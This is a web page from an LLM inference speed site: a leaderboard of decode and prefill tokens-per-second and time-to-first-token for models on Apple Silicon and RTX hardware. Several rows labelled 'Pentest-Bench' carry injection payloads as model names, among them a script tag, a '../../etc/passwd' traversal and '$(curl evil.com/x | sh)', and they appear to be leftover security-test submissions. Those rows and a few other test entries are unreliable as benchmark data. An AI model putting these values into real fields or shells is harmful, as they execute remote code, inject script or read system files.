Skip to content
llm-speed

Cheatsheet

LLM speed cheatsheet

Best decode tokens-per-second per (model × hardware) tuple measured by llm-speed under suite-v1. Numbers are wall-clock, batch size 1 unless the workload says otherwise. Each row links to the canonical run page; cite as llm-speed.com/r/<id>.

36 (model × hardware) combinations · sorted by decode tok/s · suite-v1

ModelQuantHardwareBackendWorkloaddecode tok/sprefill tok/sTTFT (ms)Run
mlx-community/stable-code-instruct-3b-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short192.5560.7226.5r_y2_5y8oo97d
mlx-community/DeepSeek-Coder-V2-Lite-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short168.3291.5449.5r_l_v1-zq_qaz
mlx-community/gpt-oss-20b-MXFP4-Q4M3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short152.7239.9692.1r_3ijun8ltjnb
mlx-community/Qwen2.5-Coder-7B-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short138.6539.6242.8r_uoehjq0nvc0
mlx-community/granite-8b-code-instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short112.3525.7220.7r_bue3bee0gw7
mlx-community/Qwen3-Coder-30B-A3B-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short112.2204.0539.3r_fpsca03u2o_
mlx-community/Yi-Coder-9B-Chat-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short103.5390.9307.0r_3hvui9a1yuc
mlx-community/gemma-2-9b-it-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short89.5170.7691.4r_iz137eqvuzy
lmstudio-community-Qwen3-Next-80B-A3B-Instruct-MLX-4bit4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short80.324.54492.5r_1pl79r50ofy
mlx-community/Qwen2.5-Coder-14B-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short70.5306.1427.9r_l36cijqxq4t
Qwen3.6-27B-Q4_K_M.ggufRTX 5090 (32GB) + AMD Ryzen 7 9850X3D 8-Core Processor (8c) + 30GBllama.cppchat-short69.93995.5r_bqsunbd6xa8
mlx-community/starcoder2-15b-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short64.2220.5489.8r_wsxml_39dh_
mlx-community/Codestral-22B-v0.1-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short47.5205.7559.1r_79dvtag5fd_
<script>alert(1)</script>Q4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_a3ei8og3rkg
victimQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_b-ndu-9uswz
actual-nameQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_0heij9dzacw
beforeafterQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r__zyiw9l3_c5
xyQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_2nqkbpdq-dk
a/b/../../etc/passwdQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_8zc2yi4had5
$(curl evil.com/x | sh)Q4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_kkseorkbdk3
innocent/bin/shQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_0laxq0naoht
test-modelQ4_K_MPentest-Benchllama.cpp@b9999chat-short42.0100.050.0r_1jskg9qv_8b
mlx-community-Qwen2.5-32B-Instruct-4bit4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short34.6141.9922.9r_njgxtgyym1e
mlx-community/Qwen2.5-Coder-32B-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short34.5144.1909.4r_721b4bls_oq
mlx-community/Qwen3-32B-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short34.495.11156.4r_anmmc80-aoq
mlx-community-Qwen2.5-7B-Instruct-4bit4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short30.5161.9809.1r_llzv_g-ymaf
mlx-community/Llama-3.1-8B-Instruct-4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short29.2203.3669.0r_h0-use1ypnb
mlx-community/gemma-2-9b-it-4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short22.0102.51151.3r_q7t7b7dcuz5
mlx-community/llama-3.3-70b-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short16.825.15419.9r_sx3a4y9n-m4
mlx-community/qwen2.5-72b-Instruct-4bitM3 Ultra (60-core GPU) + 96GB unifiedmlx@0.31.3chat-short16.323.25635.3r_5c80gthqlh6
mlx-community/phi-4-4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short15.6120.7936.0r_-w8hnn61va_
mlx-community-Qwen2.5-14B-Instruct-4bit4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short14.4117.91111.5r_ia73dzeue0b
Qwen3-32B-Instruct.Q4_K_MQ4_K_Msmoke-hostllama.cpp@b1chat-short10.0100.050.0r_r7fc52oxuvq
mQ4xllama.cppchat-short10.0r_0_i4fok_cfg
mlx-community/Qwen3-32B-4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short7.225.74287.9r_pnrrpcdqfo4
mlx-community/Qwen2.5-32B-Instruct-4bitM3 Pro (18-core GPU) + 36GB unifiedmlx@0.31.3chat-short7.133.43921.1r_f4x3xaan2ay

How to read this table

Each row is the highest decode tokens-per-second measured for a unique (model, hardware) pair. When more than one workload was run, we pick the workload that produced the headline number. Lower-tps duplicates from the same machine are not shown; click through to the run page for the full per-workload breakdown.

decode tok/s is wall-clock streaming throughput (memory-bandwidth-bound). prefill tok/s is prompt ingestion throughput (compute-bound). TTFT is time-to-first-token in milliseconds. See /glossary for definitions and /methodology for the workload spec.